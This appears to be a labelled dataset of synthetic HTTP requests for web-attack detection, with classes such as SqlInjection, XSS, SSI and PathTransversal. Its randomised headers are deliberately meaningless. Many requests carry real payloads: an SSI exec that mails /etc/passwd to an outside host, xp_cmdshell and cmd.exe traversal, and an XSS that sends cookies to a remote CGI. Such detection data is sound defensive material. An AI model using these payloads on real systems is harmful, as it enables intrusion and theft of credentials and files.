Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Trtie soom=kqItams
Range: -5173
Referer: /md6ih/nenchol/sciorT/h2nhd/itNn.exe
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.1 (compatible; MSIE 6.7; Linux i386; nmmaan; wheehhhp)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/5.1 www.ydbno6Sg.css, 1.6 20.94.179.45, 8.9 53.204.116.100
Transfer-Encoding: compress
Upgrade: tRvc9/2.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37120
Start - Id: 43625
class: OsCommanding
POST /hDwaut2v0S8YGcjgr1/apJ4JUwinnt/s8/3KrgG/hkdhggraezsoiewtnran/etas7tpdo/iP/ajvvTo/9lY.tiff? HTTP/1.0
Content-Length: 93
Content-Language: essd,ib5,smrugt
Content-Encoding: compress
Content-Location: http://uilr.cz/lTaT/sl6ccoo/rtooOoAi.ace
Content-MD5: dGpkcmVpeXRybHc2bWZ0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Dec 08 03:48:26 CET
Last-Modified: Sun, 10 Jul 05 01:12:25 CET
Host: www.itNoreio.net:183
Connection: close
Accept: video/*, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 224.134.148.160
Cookie: iub2Iai2=spvttu;adtrtg=@o
Cookie2: $Version="2"
Date: Sun, 21 Dec 08 15:11:43 GMT
ETag: W/"_wjzjt03Jr-1UO646"
Expect: 100-continue
If-Modified-Since: Fri, 01 Oct 04 12:38:20 UTC
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="hfwlezH"
Range: 887295-
Referer: /eyhtvAl/r0as/Snnthhl/eutlnh/hsAOtmoo.pdf
TE: gzip,chunked;q=0.3
Trailer: Expect
User-Agent: /bin/ps%00     |
UA-CPU: Sparc
Via: 5.5 39.198.124.49, 1.4 www.ialarn.tiff:89495
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fntw3dohausgi=d1wNfya&6otya9=66700&t8otnsf7tSagH4=ln&e6rhgmeueyu=e|sOsjtstdincadminposition

End - Id: 43625
Start - Id: 40096
class: SSI
GET /q6/hfrTaerd/f5spnnylldehfa52/i-NejIRw@G4EGrVyrhs.js?inaforloeu1ejdo=8934860784&tmEq2O=%27%3A&sse3yanS0oe2en=%3C%21--%23exec++++cmd%3D%22%2Fbin%2Fmail++++tdHirit.com+%3C+%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.psisert.gov
Connection: 4euhnsn
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 158.74.152.188
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Wed, 03 Mar 10 21:58:37 CET
ETag: "SadNG8P.EPu@j4T"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 05 Jul 09 12:39:32 UTC
If-Unmodified-Since: Thu, 02 Apr 09 17:02:28 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 02 May 05 07:33:03 CET
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: f39dwx ai6x4zin=bmpfer
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: /tieUssbo.bin
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Connection
User-Agent: uhovrasI (eIo.tDHq; aIofSlbN; yeM5.BU.; eq13cGrY)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: gzip
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40096
Start - Id: 49529
class: XPathInjection
GET /Vi4BwinntKa1C.aspx?ceIrmhoyeuab=1sdd&onN=susrkijqeoyDl44ug&ehusteie0v=9+++or+1%3C+++asid%2Fgl%2Fethii6%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D++++or++++858%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&sIrkJzjUGHhttp=cotonrtof6irdoent&5.I70=9430&EabaigwAiadutt=28317 HTTP/1.1
Host: www.byhoHde.uk
Connection: ai8as
Accept: text/html;q=0.3, text/*;q=0.1, image/jpeg;q=0.9
Accept-Charset: windows-1252, iso-8859-9, windows-1257;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: Y-phet, ohW7sn5-nudethr, htn-teuoefi;q=0.7, tmqc-dtfnan
Cache-Control: etTuet='ln'
Client-ip: 91.134.19.242
Cookie: nJ=hWXnMRAH3Gl;Ae=2;Oaidesemxutfats=1974831;eoaisqii=56628;s9gPsn=eaeae;beiieote2d=rgi2oiD
Cookie2: $Version="18"
Date: Thu, 22 Apr 10 07:32:04 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Wed, 02 Jul 08 20:08:49 CET
If-Match: "itWx1sIPDtP89K0VoC6"
If-None-Match: "zpL4WEDkwMGEvpg16"
If-Range: *
Max-Forwards: 545
MIME-Version: 4.3
Pragma: oNs3r7i=ad1engl
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 72-,357-,72130-42
Referer: http://www.fui9hqni.be/RpiuyUa/ahty3h/neAb5o/saMqa/ZbmewI.jpeg
TE: deflate;q=0.5
Trailer: Connection
User-Agent: Mozilla/5.5 (Windows; U; WinNT 2.7; rs-et; rv:3.8.6) Gecko/79803749
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5470x3164
Via: HTTP/3.0 www.eMww.jpeg:8908
Transfer-Encoding: gzip
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49529
Start - Id: 41058
class: SqlInjection
GET /ag37ceRe/c_.U9aNy/iUeAa0s3BlKvZn0gh3/3o3xou7i9rt/Ht2Y/nc.FqN6m3ecD1m/tZ/stliyoOb/2Y@Lmvwindow.openAi5abDmg/eKnR8M.jpeg?rz8i6oeuT1a=i&HwI2R5H@0D=%5Cil&qHbint-JrOdMKS=hw%3C%3Cede&eeob99adr=%27%3BEXEC+++master.dbo.xp_cmdshell++++%27cmd.exe HTTP/1.1
Host: www.ilOTtO.net
Connection: oOub
Accept: */*;q=0.2
Accept-Charset: koi8-r;q=0.5, hz-gb-2312;q=0.6, euc-tw;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.62.79.6
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="635"
Date: Sun, 05 Aug 07 18:30:19 CET
ETag: "ZF70eBKRZsZqsOka"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Thu, 01 Mar 07 07:36:18 CET
If-Unmodified-Since: Tue, 03 Aug 04 23:35:35 GMT
If-Match: "-hLVP2OJJrnmmIVur8AR"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 2787
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest username="lrrcr8"
Range: 7-04,570-
Referer: /t6ep/keao/iauro.exe
TE: trailers,deflate,trailers
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 6.0; et-ae; rv:4.1.0) Gecko/83959578
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: FTP/6.2 www.4eehn.js:05626, 4.6 94.209.235.135, 7.8 www.gdfi.htm
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 017 52.60.55.208:98691 "i7tTft" "Fri, 16 Jul 04 17:18:26 UTC"
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41058
Start - Id: 37718
class: LdapInjection
POST /JqscriptlN@L/hZSud5qog3zuaBe/eVvBT8K/nratWisLmi6Atvew/7vX648vRd3UA_K/kq/3ORshutdown.cfm? HTTP/1.1
Content-Length: 353
Content-Language: eitpG6gi,q
Content-Encoding: deflate
Content-Location: /diieor/ivtno/kaho.rar
Content-MD5: dWVhYVdpd3Nyb01sbmRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Jul 06 18:22:35 UTC
Last-Modified: Wed, 07 Feb 07 21:36:38 CET
Host: 90.209.136.162
Connection: keep-alive
Accept: */*
Accept-Charset: big5
Accept-Encoding: compress, compress, identity, compress, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 221.29.121.34
Cookie: CN_iU0q.4=4;kiCca=694926;0dstylelM=erf:7;d3ew4td=iefw1troarmazr1fhs;ujdtlo7lpDtoGa=eni61e85ifmhyoo
Cookie2: $Version="403"
Date: Wed, 21 Jan 04 03:30:39 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
From: pTja@hlne.com
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 09:40:41 CET
Max-Forwards: 1891
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bG42bmhoOHNyb3NrY25kbkdtMmhBbWJpN2V0a3FlamRJcmhscnA3bXZy
Referer: /sa51ow/ersv.mdb
TE: trailers,deflate
Trailer: Authorization
User-Agent: dhornh/6.5.7.7.4
UA-CPU: MIPS
UA-Disp: 2046,4023,32
UA-Color: color16
UA-Pixels: 8766x859
Via: ali6l/5.9 226.192.75.177, FTP/4.7 www.ue5ag.gif
Transfer-Encoding: identity
Upgrade: oOfa/5.4, fNwtol/6.6
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

ev=lptho5ihth&gxrdta=hoT&eziusS9e=boot.inird&xid.PHbe=947&tlfbelO=)  ( |   (displayName=had*)(name  =    had*)(    mail=had*    )&4gkz2g3ONdsh=taRrern21tfogirreu&eeSret=eclosAmoeeatd&bD5-hJ=nVvQZwv&w3uisame=3733152&pho=38091442&i3ie=ttisd7ROm&lerosi4wa8esEe=ri4vyerm3ec2rt&INkW.SPSZ_Q=mail6&nDfaC=58552943&5taeiumr1tlte=9W$aopt

End - Id: 37718
Start - Id: 49078
class: XPathInjection
GET /bdNETXmOGWamaYN8wIV/hInPLZKw@@2P2m9Kr7x./lrgrtohasaeinyshf9da/bwtFrgpklIru/W24/Yis/nsototlrvwpltab/ht/uhdastteyc50tnt/nfnhweeJtb.jpeg?sna8eotts=6086&oa9rbax=hz-Wx&eihA4J8kFlntbe=%3Bac%5Bhceeaatyon&5B3B7=wktrNf4Ugepe&wnnooBUsec=ba&scswoehdyOdeef=y6zyD3&c4c1sir=sg%29Nz%5Bonu&asaaocemioexjo=yhfobh%27++or+%28i+++++%3C+++count%28b5edo%2Fchild%3A%3Atext%28%29%29++++and++++j+%3C+count%28ms%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++%3C++count%28ykm%2Fchild%3A%3A*%29+++++%29++++or+++++%278teet%27+%3D+%27++++evwont8D%27++or HTTP/1.0
Host: www.aaewtiha.ch:80
Connection: close
Accept: video/quicktime
Accept-Charset: iso-8859-1, iso-2022-kr;q=0.2, isiri-3342, windows-1254;q=0.3, x-mac-japanese
Accept-Encoding: *;q=0.2
Accept-Language: ieter-n6led
Cache-Control: max-stale=150
Client-ip: 22.250.1.169
Cookie: nsystemZab=nR5y
Cookie2: $Version="08"
Date: Sun, 22 May 05 12:27:07 GMT
ETag: W/"J5ZrTZFKYipwFlmzpF"
Expect: 100-continue
From: iovise@dAaalkEsu9.ch
If-Modified-Since: Sat, 27 May 06 03:47:10 CET
If-Unmodified-Since: Sat, 10 Feb 07 07:47:44 CET
If-Match: "JjE1W-5YpcKz_Bq"
If-None-Match: *
If-Range: *
Max-Forwards: 489
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: Digest nonce
Range: -42,-211,1-7615
Referer: http://hxaeie.biz/Zgd3/nerBohd/moivtoI/spoudDor/b8dsti.php
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: nudr/1.4.1
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: FTP/0.0 2.1.152.82
Transfer-Encoding: elttgt; 0waeyagl=2fsrT
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 7433292
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49078
Start - Id: 47672
class: XSS
GET /nwAWmveSIAqFzuD/1TxDMayf-mW-DQ/oathcxoOrrsOt1nEs.tiff?t5bypthdc55yea=dBns%3C&iEa=%3Cdiv++++style++++%3D++++%22++width%3A+expression%28%5Balert%28%27htnt%27%29%3B%5D%29%3B++++%22++++%3E&ndlEeIae=073393&Y5acceptaj27=b6_gHs&nyeNg6i=i86tteEn5oF5n16iie&i5m=r&nhdwnds1ot=lv6ywStenhhdl&t2rrncrseso=mlcst HTTP/1.1
Host: www.ifttahm.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: neornsdE-IA;q=0.8
Cache-Control: no-store
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="699"
Date: Sun, 09 Aug 09 24:50:02 GMT
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Wed, 08 Mar 06 21:44:58 UTC
If-Unmodified-Since: Wed, 28 Jan 09 03:46:14 CET
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: /ivelitop.swf
TE: trailers,chunked
Trailer: From
User-Agent: 0iciRr/4.8
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 558 194.108.196.44 "letduvqanrqo" 
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47672
Start - Id: 41862
class: SqlInjection
GET /aYI/baheEDeaee0/frommKE6EeGxyautoexecLa/deLoadfemaiiaerF1h/oVxzPkx8Pi/twilttzJHpnsxhem/ZchildT/nhplctm9mrzaa5fgon.swf?hrtecr6rsp5qii=64833&pYQe52AQS=caSuRwyotu5a9&iveNEtpm46sTyIe=5eG%40t&YNyhcscriptXDH4Is=736082&dsu4ntodoAHCo=759357839&LBAu=a+h&dielweAt=o&t3h1h0i=7979527&phpXH5X=743571&ZXp0d-Vr1O8=%27select+++++customer_phone+++++%27%7C%7C%27from+++++customers+++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27+and+++++customer_type%3D1%27%3B&eaElwcITYpmn=220599421&hg5rt4R3triqt=negtxfi&6ed1d0=Ain9e-ei%7E2&mMFrY-Raaccess_logG=oqsa HTTP/1.1
Host: www.9hKtzot27.fr
Connection: nraqwef
Accept: text/*;q=0.4, image/jpeg;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=76
Client-ip: 91.138.91.59
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="72"
Date: Wed, 04 Oct 06 05:58:24 CET
ETag: W/"@9jCwLUC@qhv5.dvLSP2"
Expect: hbnaeaon=kuEqf
From: alubns@ssude.cz
If-Modified-Since: Thu, 30 Apr 09 10:46:23 CET
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: "xaUZu4e300qoa_gd3qG"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.2
Pragma: j=lxU4
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: http://www.aelontnt.st/aatepp/niyi/lexNeei.css
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: fame/7.0
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: gzip
Upgrade: i1en7/5.4, wsdt/7.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41862
Start - Id: 46344
class: PathTransversal
GET /P.nhttpsexecwp-/aonAmyaAeou6/Tnhaeae/ofvIea@N4w/eBszC6M_J/iy-iqUwP/R8Y1SEusrVLdYU/p92z_c8WIRjpetXPx/inmUuy5.php?asn=t%3Aesi%2Beserviceswtll&4ethfdfn=99449046&nNgCnodec3execkV=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&4nlenTkrtLgw=h2f&Vr=%28+&xecsmi=c+n+&V7xYkLbJaOnl=ry HTTP/1.0
Host: 249.172.113.167:80
Connection: oirnne
Accept: audio/x-wav;q=0.2, image/*;q=0.2, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: s-chtsg;q=0.6, I2b-ahwysne
Cache-Control: max-stale=1
Client-ip: 51.115.37.124
Cookie2: $Version="19"
Date: Sun, 25 Oct 09 22:46:40 GMT
If-Modified-Since: Wed, 24 Sep 08 10:42:33 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 8
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: http://5aes.net/frqcie/ctrz/roleE/vtya.wmn
Trailer: Proxy-Authorization
User-Agent: b6tn (eAwU@96; yx0J@o; e9.mAMd; igzAMJYB; osvLZJ3Ohl)
UA-Pixels: 648x2225
Via: HTTP/6.5 10.254.153.19
Transfer-Encoding: deflate

null

End - Id: 46344
Start - Id: 46467
class: PathTransversal
POST /UeAYeakestdinW0/ewRuDYrb.gif? HTTP/1.1
Content-Length: 51
Content-Language: 4bw,ioarG4ds
Content-Encoding: gzip
Content-Location: http://lumicoir.gov/fqeeueto/eqon/r1zmola/7alff.msf
Content-MD5: Z1Vna29lbHlyOW1hamM0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Dec 05 01:57:03 CET
Last-Modified: Thu, 04 May 06 02:41:12 GMT
Host: www.eetyrpr.com
Connection: tvuera
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-chinesesimp, x-mac-roman;q=0.3, big5, shift_jis
Accept-Encoding: deflate, identity, compress;q=0.3, compress;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-cache
Cookie: 5YuJKOF781=ss;iimx3ut= e;gpxlnje4=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Date: Sun, 22 Jul 07 09:21:52 CET
If-Unmodified-Since: Thu, 06 Dec 07 06:19:33 CET
If-Match: "M_aNMPgmgZEPTyyJ9"
If-None-Match: "E2f1ksT9bU9kc45n"
Max-Forwards: 5956
Range: 16479-93,5481-
Referer: http://ehieWti.be/dhgwuax/todd.png
TE: deflate;q=0.3
User-Agent: 8rLalsahne03i
UA-CPU: MIPS
UA-Disp: 718,823,8
Transfer-Encoding: gzip
Upgrade: NouTtP/6.7, tqdt/1.6
Warning: 997 129.21.234.173:8 "5nctderteeerrhega" "Fri, 08 Jun 07 17:33:17 CET"
X-Forwarded-For: 188.155.147.196

shtaccesn1eholibifNn=6930&ifrstr=675&jmeta-VJ=|ba

End - Id: 46467
Start - Id: 43813
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.onKsesHthe.fr
Connection: tgienel9
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-age=3313
Client-ip: 117.85.13.55
Cookie: eleneHassefFeb=c<rEesn<hsevLinI ;0h4eshlea=t4uuex;srsh0bkvml=igramochahnecho
Cookie2: $Version="7"
Date: Sat, 12 Feb 05 08:52:25 CET
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: trty=ewnjetuk;ec4Oaae=mthnicad
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: *
If-Range: "334P3qq-3npHYIgugx6p"
Max-Forwards: 28
MIME-Version: 0.3
Pragma: adets='coCaujeo'
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Basic cHBzb0U6bHloZQ==
Range: 904036-,02113-35,44499-
Referer: /netahahy/3Isou6a/i9heosen/vAsksz.jpg
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: tEo3e (tZq3xDz; tzbNlFtK; b76.orQE0)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 0.7 www.itme.htm
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43813
Start - Id: 38388
class: LdapInjection
GET /snnsaaydih/faNT7bxW/ds/s.ir.ORpDDMxM2BAqgZS/n1lci/mailo/Irsdeletepaccess_logm-Phoid/uTrlsnwairyhcdnt.png?5TMI=569149311&HAgQhome2t8J=h&tdhmEarsatspDp=mideleten&sock_streamvg5u=lu3M%273anw&NWLVBBandq=s%7Enf0&aaa=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.Ltw8nrQe.biz
Connection: ooestrt
Accept: application/zip;q=0.0, video/quicktime;q=0.3, audio/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: O-pru, tEhlaac-Loymdo5, n-7o
Cache-Control: max-stale
Client-ip: 64.84.236.66
Cookie: e87inyTss=84878050;ec5eoowE2m=$uera+adsystemBz>;iFUlogOV=23;MnetcatNo=729831;1r5rm=hmetaeaO;8b79=2304
Cookie2: $Version="662"
Date: Thu, 01 May 08 18:39:43 CET
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 29 Sep 05 01:44:50 GMT
If-Unmodified-Since: Tue, 21 Nov 06 09:51:10 UTC
If-Match: "R4xPtV2oP8npzAVEVCq2"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6
MIME-Version: 5.2
Pragma: oe='tTuaq'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 4sexi cs9e=nrrbsKhu
Range: 5-3896,18685-499682,-36
Referer: /nsshijt/qflrba/heTmynd.avi
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: eusmherdix (aAY8aN; hh-jGBW@D)
UA-CPU: x86
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: identity
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38388
Start - Id: 46775
class: XSS
POST /nkJ3/dv/IknIu1EqvKbsTena/s2yO6p9t0uun.sh? HTTP/1.1
Content-Length: 288
Content-Language: hNfl
Content-Encoding: deflate
Content-Location: /etetdMt/3coaan/eef6fi/ffca/aJag.jpeg
Content-MD5: ZWRleXhud2g3Z3doaXlFeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 07:56:05 GMT
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: 239.254.43.48:640
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: xtit-d;q=0.1, nwotprE-sac, aNent-a8thuoei, ohnicjts-sgE, tistt-esl
Cache-Control: max-stale
Client-ip: 19.200.37.172
Cookie: 73inIri9=om6rve5|th:;elemaacah6Sxaa=e4eyOi>hxMBLbnd;emat=ze;dAcldlte9hr=g-@QeP;unrdhrOeh=Rerdo8u;vauenew=92104837
Cookie2: $Version="46"
Date: Wed, 14 Oct 09 21:48:51 CET
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Tue, 06 Feb 07 12:57:26 CET
If-Unmodified-Since: Fri, 02 Nov 07 08:57:18 CET
If-Match: *
If-None-Match: "eS7EXS-dazc9KeOk"
If-Range: "Il4PljWGfirCLPvpDwW"
Max-Forwards: 99
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="9mhcA"
Authorization: ulhm lrnaont=tyEbeoT
Range: 462-
Referer: /tqtz.php3
TE: deflate;q=0.3,gzip;q=0.9,trailers
User-Agent: dOmvdeoeT4n7tVnpui
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.6 147.45.27.114:7
Transfer-Encoding: compress
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 670782401629
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

j2soTklScseani=&{[document.location.replace  ('http://www.ma.com/cgi-bin/olroll.cgi'+document.cookie);]};&rGuaexsxrnatoz=recmtuqittn&iMAUP@=pn&H1c2R=ewZ8_-Gc8&nigtylee=713485050&xn=0&inp8ma4Rahheyus=cupmsbin8'm8eNsd'&wcjiw2tneI=lunnno9&Ane=7485908302

End - Id: 46775
Start - Id: 35429
class: SqlInjection
GET /YreplaceWFN-aQH@AzU/tNQH1IfMz6hxF1Z4-6Z@/i4oX6xqM7rTkQKrpzx.tiff?dgthtbcrfvSe=%27+++++union+++select+++++%40%40version%2C1%2C1%2C1--&sA4eigt8mmiU4=nfnemris%3Dbsq&omdshdAcsgei=tntppsnea&_YFMKuKa=nccN%5CuarnnO HTTP/1.1
Host: www.zWhwepYho.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.1, compress, gzip, identity
Accept-Language: Tsai-in;q=0.9, tss2-trne;q=0.9, 8-ik2tudae;q=0.1, iy-6, ipehaXd-pn
Cache-Control: min-fresh=141
Client-ip: 185.9.17.112
Cookie: tReH=d2YqD;wbeae=27680106;2ln=9156;rswutu6aeatiyl=uslsadaHoncivUlNti
Date: Tue, 12 Apr 05 03:00:38 CET
ETag: "YTG2LO7_ImU6D9U"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: *
If-None-Match: *
